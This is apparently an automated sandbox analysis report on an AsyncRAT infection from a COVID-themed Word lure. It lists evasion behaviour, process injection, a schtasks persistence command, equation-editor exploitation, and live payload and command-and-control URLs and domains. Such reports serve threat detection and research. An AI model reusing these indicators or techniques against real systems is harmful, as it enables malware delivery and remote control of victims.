Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\69577.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match File source: 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 69577.exe PID: 2384, type: MEMORY
Source: Yara match File source: 4.2.69577.exe.249fdd4.4.raw.unpack, type: UNPACKEDPE
Yara detected AsyncRAT
Source: Yara match File source: 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 69577.exe PID: 2384, type: MEMORY
Source: Yara match File source: Process Memory Space: 69577.exe PID: 2468, type: MEMORY
Source: Yara match File source: 4.2.69577.exe.25b56fc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.69577.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.69577.exe.25b56fc.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.69577.exe.249fdd4.4.raw.unpack, type: UNPACKEDPE
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\Public\69577.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: 69577.exe, 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp, 69577.exe, 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Contains capabilities to detect virtual machines
Source: C:\Users\Public\69577.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum name: 0
Source: C:\Users\Public\69577.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\Public\69577.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 name: DriverDesc
Source: C:\Users\Public\69577.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\69577.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\Public\69577.exe Window / User API: threadDelayed 8917
Source: C:\Users\Public\69577.exe Window / User API: threadDelayed 643
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2380 Thread sleep time: -240000s >= -30000s
Source: C:\Users\Public\69577.exe TID: 2324 Thread sleep time: -99889s >= -30000s
Source: C:\Users\Public\69577.exe TID: 2924 Thread sleep time: -240000s >= -30000s
Source: C:\Users\Public\69577.exe TID: 2924 Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\69577.exe TID: 2760 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\69577.exe TID: 2784 Thread sleep time: -360000s >= -30000s
Source: C:\Users\Public\69577.exe TID: 2804 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\Public\69577.exe TID: 2804 Thread sleep count: 52 > 30
Source: C:\Users\Public\69577.exe TID: 3020 Thread sleep count: 8917 > 30
Source: C:\Users\Public\69577.exe TID: 3020 Thread sleep count: 643 > 30
Source: C:\Users\Public\69577.exe File Volume queried: C:\ FullSizeInformation
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: 69577.exe, 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp Binary or memory string: vmware
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp Binary or memory string: 2m"SOFTWARE\VMware, Inc.\VMware Tools483m
Source: 69577.exe, 00000004.00000002.2114360333.00000000002E4000.00000004.00000001.sdmp Binary or memory string: VMware_S
Source: 69577.exe, 00000004.00000002.2116590485.0000000005920000.00000004.00000001.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: 69577.exe, 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp Binary or memory string: 2m"SOFTWARE\VMware, Inc.\VMware Tools
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp Binary or memory string: 2m%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: 69577.exe, 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp Binary or memory string: 3m"SOFTWARE\VMware, Inc.\VMware Tools
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

Enables debug privileges
Source: C:\Users\Public\69577.exe Process token adjusted: Debug
Source: C:\Users\Public\69577.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\Public\69577.exe Memory written: C:\Users\Public\69577.exe base: 400000 value starts with: 4D5A
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: C:\Users\Public\69577.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\rLliXAh' /XML 'C:\Users\user\AppData\Local\Temp\tmpA055.tmp'
Source: C:\Users\Public\69577.exe Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: 69577.exe, 00000007.00000002.2352370266.00000000024FE000.00000004.00000001.sdmp Binary or memory string: Program ManagerHD3m
Source: 69577.exe, 00000007.00000002.2352176065.0000000001080000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: 69577.exe, 00000007.00000002.2352176065.0000000001080000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: 69577.exe, 00000007.00000002.2352370266.00000000024FE000.00000004.00000001.sdmp Binary or memory string: Program ManagerHD3m%
Source: 69577.exe, 00000007.00000002.2352176065.0000000001080000.00000002.00000001.sdmp Binary or memory string: !Progman
Source: 69577.exe, 00000007.00000002.2353238180.00000000047CA000.00000004.00000001.sdmp Binary or memory string: Message/Program Managerility Mode] - Microsoft Word Mode] - Micros
Source: 69577.exe, 00000007.00000002.2351851374.0000000000513000.00000004.00000020.sdmp Binary or memory string: Program ManagerR

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\69577.exe Queries volume information: C:\Users\Public\69577.exe VolumeInformation
Source: C:\Users\Public\69577.exe Code function: 4_2_00694B1C GetUserNameA, 4_2_00694B1C
Source: C:\Users\Public\69577.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected AsyncRAT
Source: Yara match File source: 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 69577.exe PID: 2384, type: MEMORY
Source: Yara match File source: Process Memory Space: 69577.exe PID: 2468, type: MEMORY
Source: Yara match File source: 4.2.69577.exe.25b56fc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.69577.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.69577.exe.25b56fc.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.69577.exe.249fdd4.4.raw.unpack, type: UNPACKEDPE
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\Public\69577.exe WMI Queries: IWbemServices::ExecQuery - Select * from AntivirusProduct

Behavior Graph:

Behavior Graph ID: 356233
Sample: Deadly Variants of Covid 19.doc
Startdate: 22/02/2021
Architecture: WINDOWS
Score: 100

Signatures on the sample:
  • Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  • Multi AV Scanner detection for dropped file
  • Sigma detected: Scheduled temp file as task from temp location
  • 16 other signatures

Process tree:
  • WINWORD.EXE (291, 28) started
  • EQNEDT32.EXE (13) started
      DNS/IP: sgkmudder.org.tr 93.89.224.134, 49168, 80, TR-FBSTR, Turkey
      DNS/IP: bit.ly 67.199.248.10, 49167, 80, GOOGLE-PRIVATE-CLOUDUS, United States
      Dropped: C:\Users\user\...\mgLD5CcdJx9YVKl[1].jpg, PE32
      Dropped: C:\Users\Public\69577.exe, PE32
      Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
      • 69577.exe (3) started
          Dropped: C:\Users\user\AppData\Roaming\rLliXAh.exe, PE32
          Dropped: C:\Users\user\AppData\Local\...\tmpA055.tmp, XML
          Signature: Multi AV Scanner detection for dropped file
          Signature: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
          Signature: Machine Learning detection for dropped file
          Signature: Injects a PE file into a foreign processes
          • 69577.exe (4) started
              DNS/IP: greatestyear2021.ddns.net 79.134.225.49, 49169, 5000, FINK-TELECOM-SERVICESCH, Switzerland
          • schtasks.exe started

Contacted Public IPs

IP              Domain    Country         ASN      ASN Name                  Malicious
79.134.225.49   unknown   Switzerland     6775     FINK-TELECOM-SERVICESCH   true
93.89.224.134   unknown   Turkey          51557    TR-FBSTR                  false
67.199.248.10   unknown   United States   396982   GOOGLE-PRIVATE-CLOUDUS    false

Contacted Domains

Name                        IP              Active
bit.ly                      67.199.248.10   true
greatestyear2021.ddns.net   79.134.225.49   true
sgkmudder.org.tr            93.89.224.134   true

Contacted URLs

Name                                              Malicious   Antivirus Detection     Reputation
http://sgkmudder.org.tr/2d/mgLD5CcdJx9YVKl.jpg    false       Avira URL Cloud: safe   unknown
http://bit.ly/2Me6ei3                             false                               high